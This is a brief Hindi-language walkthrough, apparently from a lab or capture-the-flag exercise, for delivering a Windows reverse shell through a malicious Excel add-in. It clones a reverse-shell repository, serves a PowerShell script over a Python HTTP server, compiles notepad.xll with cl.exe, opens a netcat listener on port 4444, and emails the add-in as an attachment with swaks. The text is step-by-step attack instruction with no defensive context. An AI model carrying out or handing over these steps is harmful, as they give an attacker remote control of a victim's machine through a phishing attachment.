
xll windows reverse shell
xll विंडोज रिवर्स शेल
git clone https://github.com/n3rdh4x0r/xll_windows_reverse_shell.git
revsh.ps1 को अपडेट करेंpython3 -m http.server 9999
notpadXLL.c को अपनी Windows हमलावर मशीन पर ले जाएं और notpadXLL.c को उसी के अनुसार अपडेट करें।x64 Native Tools Command Prompt for VS 2022 खोलेंnotepad.xll जनरेट करने के लिए नीचे दिया गया कमांड चलाएंcl.exe /LD notepadXLL.c /link /out:notepad.xll

notepad.xll को अपनी Kali मशीन पर ले जाएंswaks डाउनलोड करें curl -O https://jetmore.org/john/code/swaks/files/swaks-20240103.0/swaks
nc -nlvp 4444
notepad.xll संलग्न करके ईमेल भेजने के लिए swaks का उपयोग करें:./swaks --to [email protected] --from [email protected] --server 10.10.11.21 --port 25 --header "Subject: test" --body "test" --attach @notepad.xll
